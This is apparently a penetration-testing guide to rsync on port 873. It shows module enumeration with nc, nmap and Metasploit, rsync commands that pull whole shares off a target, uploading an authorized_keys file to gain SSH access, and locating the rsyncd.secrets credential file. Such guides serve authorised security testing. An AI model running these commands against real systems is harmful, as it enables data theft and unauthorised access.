4.5 KiB
873 - Pentesting Rsync
Basic Information
rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification timesand sizes of files.[3] It is commonly found on Unix-like operating systems. The rsync algorithm is a type of delta encoding, and is used for minimizing network usage. Zlib may be used for additional data compression,[3] and SSH or stunnel can be used for security.
From wikipedia.
Default port: 873
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
Enumeration
Banner & Manual communication
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
Enumerate shared folders
An rsync module is essentially a directory share. These modules can optionally be protected by a password. This options lists the available modules and, optionally, determines if the module requires a password to access**:**
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
Notice that it could be configured a shared name to not be listed. So there could be something hidden.
Notice that it may be some shared names being listed where you need some (different) credentials to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _"Access Denied"_ message when trying to access some of those.
****Brute force
Manual Rsync
Once you have the list of modules you have a few different options depending on the actions you want to take and whether or not authentication is required. **If authentication is not required **you can **list **a shared folder:
rsync -av --list-only rsync://192.168.0.123/shared_name
And **copy **all **files **to your local machine via the following command:
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
This recursively transfers all files from the directory <shared_name>
on the machine <IP>
into the ./rsync_shared
directory on the local machine. The files are transferred in "archive" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer.
If you **have credentials **you can list/download a **shared name **using (the password will be prompted):
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
You could also **upload **some **content **using rsync (for example, in this case we can upload an _**authorized_keys **_file to obtain access to the box):
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
POST
Find the rsyncd configuration file:
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Inside the config file sometimes you could find the parameter secrets file = /path/to/file and this file could contains usernames and passwords allowed to authenticate to rsyncd.